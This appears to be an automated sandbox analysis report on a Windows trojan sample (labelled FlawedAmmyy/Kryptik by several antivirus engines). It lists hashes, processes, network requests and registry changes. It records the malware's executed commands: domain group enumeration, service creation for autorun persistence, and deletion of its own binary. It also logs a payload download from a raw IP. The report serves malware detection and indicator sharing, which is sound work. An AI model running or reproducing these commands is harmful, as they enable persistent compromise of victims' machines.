paladin316

lt1.json

Jun 19th, 2019
  1.  
  2. [*] MalFamily: ""
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "lt1"
  7. [*] File Size: 159488
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "b07340bd812ac1d6bab85b1b49c4e935f100b17d59da632533c8ddd361529f10"
  10. [*] MD5: "2fcfddd92568af831a6f8febb817c900"
  11. [*] SHA1: "0e5f89ff146d7b1b6af5826a67fad93cdb3f7657"
  12. [*] SHA512: "4b11d0ff41ab6a58aad3de510fab8172521345372724047911355babd2bbfa32dc4fc2adff138de852de5fa3ca3ecbfafeff99d790eb6d000b8b397f3a312b9e"
  13. [*] CRC32: "853324A9"
  14. [*] SSDEEP: "3072:1k7WT8wAl28+h9VbjXKvKmeykXWlZrT8JUPQImMJ2szDHqldYPaShV1C8/Wn:1kHhl28+VbjXKvKmeykiZT8AQImz7YSB"
  15.  
  16. [*] Process Execution: [
  17. "lt1.exe",
  18. "net.exe",
  19. "net1.exe",
  20. "net.exe",
  21. "net1.exe",
  22. "cmd.exe",
  23. "net.exe",
  24. "net1.exe",
  25. "cmd.exe",
  26. "sc.exe",
  27. "cmd.exe",
  28. "net.exe",
  29. "net1.exe",
  30. "cmd.exe",
  31. "sc.exe",
  32. "cmd.exe",
  33. "sc.exe",
  34. "cmd.exe",
  35. "net.exe",
  36. "net1.exe",
  37. "cmd.exe",
  38. "services.exe",
  39. "wsus.exe",
  40. "wsus.exe",
  41. "svchost.exe",
  42. "svchost.exe",
  43. "msiexec.exe",
  44. "GoogleUpdate.exe",
  45. "svchost.exe",
  46. "taskhost.exe"
  47. ]
  48.  
  49. [*] Signatures Detected: [
  50. {
  51. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
  52. "Details": [
  53. {
  54. "IP": "185.106.122.120:80"
  55. },
  56. {
  57. "IP": "172.217.11.163:443"
  58. }
  59. ]
  60. },
  61. {
  62. "Description": "Creates RWX memory",
  63. "Details": []
  64. },
  65. {
  66. "Description": "A process attempted to delay the analysis task.",
  67. "Details": [
  68. {
  69. "Process": "wsus.exe tried to sleep 599 seconds, actually delayed analysis time by 0 seconds"
  70. }
  71. ]
  72. },
  73. {
  74. "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
  75. "Details": [
  76. {
  77. "ioc": "http://crl.globalsign.net/root-r2.crl0"
  78. }
  79. ]
  80. },
  81. {
  82. "Description": "Reads data out of its own binary image",
  83. "Details": [
  84. {
  85. "self_read": "process: wsus.exe, pid: 1720, offset: 0x00000000, length: 0x00000400"
  86. }
  87. ]
  88. },
  89. {
  90. "Description": "A process created a hidden window",
  91. "Details": [
  92. {
  93. "Process": "lt1.exe -> cmd"
  94. },
  95. {
  96. "Process": "lt1.exe -> cmd"
  97. },
  98. {
  99. "Process": "lt1.exe -> cmd"
  100. },
  101. {
  102. "Process": "lt1.exe -> cmd"
  103. },
  104. {
  105. "Process": "lt1.exe -> cmd"
  106. },
  107. {
  108. "Process": "lt1.exe -> cmd"
  109. },
  110. {
  111. "Process": "lt1.exe -> C:\\Windows\\System32\\cmd.exe"
  112. }
  113. ]
  114. },
  115. {
  116. "Description": "Drops a binary and executes it",
  117. "Details": [
  118. {
  119. "binary": "C:\\ProgramData\\NuGets\\wsus.exe"
  120. }
  121. ]
  122. },
  123. {
  124. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  125. "Details": [
  126. {
  127. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  128. },
  129. {
  130. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  131. },
  132. {
  133. "suspicious_request": "http://185.140.248.17/01.dat"
  134. },
  135. {
  136. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  137. },
  138. {
  139. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  140. },
  141. {
  142. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  143. },
  144. {
  145. "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
  146. },
  147. {
  148. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
  149. },
  150. {
  151. "suspicious_request": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
  152. },
  153. {
  154. "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
  155. },
  156. {
  157. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
  158. },
  159. {
  160. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
  161. },
  162. {
  163. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
  164. },
  165. {
  166. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
  167. },
  168. {
  169. "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
  170. },
  171. {
  172. "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
  173. },
  174. {
  175. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
  176. },
  177. {
  178. "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
  179. },
  180. {
  181. "suspicious_request": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
  182. },
  183. {
  184. "suspicious_request": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
  185. },
  186. {
  187. "suspicious_request": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
  188. },
  189. {
  190. "suspicious_request": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
  191. },
  192. {
  193. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
  194. },
  195. {
  196. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
  197. },
  198. {
  199. "suspicious_request": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
  200. },
  201. {
  202. "suspicious_request": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
  203. }
  204. ]
  205. },
  206. {
  207. "Description": "Performs some HTTP requests",
  208. "Details": [
  209. {
  210. "url": "http://185.140.248.17/01.dat"
  211. },
  212. {
  213. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  214. },
  215. {
  216. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  217. },
  218. {
  219. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  220. },
  221. {
  222. "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
  223. },
  224. {
  225. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
  226. },
  227. {
  228. "url": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
  229. },
  230. {
  231. "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
  232. },
  233. {
  234. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
  235. },
  236. {
  237. "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
  238. },
  239. {
  240. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
  241. },
  242. {
  243. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
  244. },
  245. {
  246. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
  247. },
  248. {
  249. "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
  250. },
  251. {
  252. "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
  253. },
  254. {
  255. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
  256. },
  257. {
  258. "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
  259. },
  260. {
  261. "url": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
  262. },
  263. {
  264. "url": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
  265. },
  266. {
  267. "url": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
  268. },
  269. {
  270. "url": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
  271. },
  272. {
  273. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
  274. },
  275. {
  276. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
  277. },
  278. {
  279. "url": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
  280. },
  281. {
  282. "url": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
  283. }
  284. ]
  285. },
  286. {
  287. "Description": "Deletes its original binary from disk",
  288. "Details": []
  289. },
  290. {
  291. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  292. "Details": [
  293. {
  294. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 11852309 times"
  295. }
  296. ]
  297. },
  298. {
  299. "Description": "Installs itself for autorun at Windows startup",
  300. "Details": [
  301. {
  302. "service name": "foundation"
  303. },
  304. {
  305. "service path": "C:\\ProgramData\\NuGets\\wsus.exe -service"
  306. }
  307. ]
  308. },
  309. {
  310. "Description": "File has been identified by 19 Antiviruses on VirusTotal as malicious",
  311. "Details": [
  312. {
  313. "FireEye": "Generic.mg.2fcfddd92568af83"
  314. },
  315. {
  316. "Alibaba": "Trojan:Win32/Kryptik.24c3281f"
  317. },
  318. {
  319. "Invincea": "heuristic"
  320. },
  321. {
  322. "Symantec": "Trojan.Flawedammyy"
  323. },
  324. {
  325. "Paloalto": "generic.ml"
  326. },
  327. {
  328. "Kaspersky": "HEUR:Trojan.Win32.Generic"
  329. },
  330. {
  331. "Rising": "Trojan.Kryptik!8.8 (CLOUD)"
  332. },
  333. {
  334. "McAfee-GW-Edition": "Artemis!Trojan"
  335. },
  336. {
  337. "SentinelOne": "DFI - Suspicious PE"
  338. },
  339. {
  340. "ESET-NOD32": "a variant of Win32/Kryptik.GTDL"
  341. },
  342. {
  343. "Endgame": "malicious (high confidence)"
  344. },
  345. {
  346. "ZoneAlarm": "HEUR:Trojan.Win32.Generic"
  347. },
  348. {
  349. "AhnLab-V3": "Downloader/Win32.FlawedAmmyy.C3289538"
  350. },
  351. {
  352. "McAfee": "Artemis!2FCFDDD92568"
  353. },
  354. {
  355. "VBA32": "BScope.Trojan.Zenpak"
  356. },
  357. {
  358. "Cylance": "Unsafe"
  359. },
  360. {
  361. "Ikarus": "Trojan.Win32.Crypt"
  362. },
  363. {
  364. "AVG": "FileRepMalware"
  365. },
  366. {
  367. "CrowdStrike": "win/malicious_confidence_90% (W)"
  368. }
  369. ]
  370. }
  371. ]
  372.  
  373. [*] Started Service: [
  374. "foundation",
  375. "msiserver",
  376. "gupdate"
  377. ]
  378.  
  379. [*] Executed Commands: [
  380. "net group /domain",
  381. "\"C:\\Windows\\System32\\cmd.exe\" /C net.exe stop foundation",
  382. "cmd /C net.exe stop foundation",
  383. "\"C:\\Windows\\System32\\cmd.exe\" /C sc delete foundation",
  384. "cmd /C sc delete foundation",
  385. "\"C:\\Windows\\System32\\cmd.exe\" /C sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
  386. "cmd /C sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
  387. "\"C:\\Windows\\System32\\cmd.exe\" /C net.exe start foundation y",
  388. "cmd /C net.exe start foundation y",
  389. "C:\\Windows\\System32\\cmd.exe /c del C:\\Users\\user\\AppData\\Local\\Temp\\lt1.exe >> NUL",
  390. "C:\\Windows\\system32\\net1 group /domain",
  391. "net.exe stop foundation",
  392. "sc delete foundation",
  393. "C:\\Windows\\system32\\net1 stop foundation",
  394. "sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
  395. "net.exe start foundation y",
  396. "C:\\Windows\\system32\\net1 start foundation y",
  397. "C:\\ProgramData\\NuGets\\wsus.exe -service",
  398. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  399. "C:\\Windows\\system32\\msiexec.exe /V",
  400. "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc",
  401. "C:\\Windows\\System32\\svchost.exe -k netsvcs",
  402. "\"C:\\ProgramData\\NuGets\\wsus.exe\" -nogui"
  403. ]
  404.  
  405. [*] Mutexes: [
  406. "Local\\ZoneAttributeCacheCounterMutex",
  407. "Local\\ZonesCacheCounterMutex",
  408. "Local\\ZonesLockedCacheCounterMutex",
  409. "DBWinMutex",
  410. "Broiduti#3483488**#",
  411. "Global\\_MSIExecute",
  412. "Global\\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}",
  413. "Global\\G{6885AE8E-C070-458d-9711-37B9BEAB65F6}",
  414. "Global\\G{66CC0160-ABB3-4066-AE47-1CA6AD5065C8}",
  415. "Global\\G{0A175FBE-AEEC-4fea-855A-2AA549A88846}"
  416. ]
  417.  
  418. [*] Modified Files: [
  419. "\\Device\\NamedPipe",
  420. "C:\\ProgramData\\NuGets\\template_41c318.TMPTMPZIP7",
  421. "C:\\ProgramData\\NuGets\\wsus.exe",
  422. "\\??\\PIPE\\wkssvc",
  423. "\\??\\PIPE\\lsarpc",
  424. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  425. "\\??\\WMIDataDevice",
  426. "\\??\\PIPE\\samr",
  427. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  428. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  429. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  430. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  431. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  432. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  433. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  434. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  435. "\\??\\NUL",
  436. "C:\\Windows\\Installer\\23b7c89.msi",
  437. "C:\\Windows\\Installer\\23b7c8a.msi",
  438. "\\??\\pipe\\GoogleCrashServices\\S-1-5-18",
  439. "C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat",
  440. "C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat"
  441. ]
  442.  
  443. [*] Deleted Files: [
  444. "C:\\ProgramData\\Microsoft Help\\wsus.exe",
  445. "C:\\ProgramData\\NuGets\\wsus.exe",
  446. "C:\\ProgramData\\NuGets\\template_41c318.TMPTMPZIP7",
  447. "C:\\Users\\user\\AppData\\Local\\Temp\\lt1.exe",
  448. "C:\\Windows\\Installer\\23b7c89.msi",
  449. "C:\\Program Files (x86)\\Google\\Update\\Install\\{0E51DEF1-ED79-4FDA-92A7-D7F8B9999365}\\GoogleUpdateSetup.exe",
  450. "C:\\Program Files (x86)\\Google\\Update\\Install\\{0E51DEF1-ED79-4FDA-92A7-D7F8B9999365}"
  451. ]
  452.  
  453. [*] Modified Registry Keys: [
  454. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  455. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  456. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  457. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\msiserver\\Type",
  458. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\gupdate\\Type",
  459. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Start",
  460. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Type",
  461. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\netsxuid",
  462. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  463. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  464. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  465. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  466. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  467. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  468. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  469. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  470. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  471. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  472. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
  473. "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}",
  474. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}\\PersistedPingString",
  475. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}\\PersistedPingTime",
  476. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\pv",
  477. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\pv",
  478. "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\CurrentState",
  479. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\CurrentState\\StateValue",
  480. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000_CLASSES\\Local Settings\\MuiCache\\2E\\52C64B7E\\LanguageList",
  481. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Google\\Update\\proxy\\source",
  482. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\RollCallDayStartSec",
  483. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\DayOfLastRollCall",
  484. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\ping_freshness",
  485. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\(Default)",
  486. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\hint",
  487. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\name",
  488. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\LastCheckSuccess",
  489. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\dr",
  490. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\ActivePingDayStartSec",
  491. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\RollCallDayStartSec",
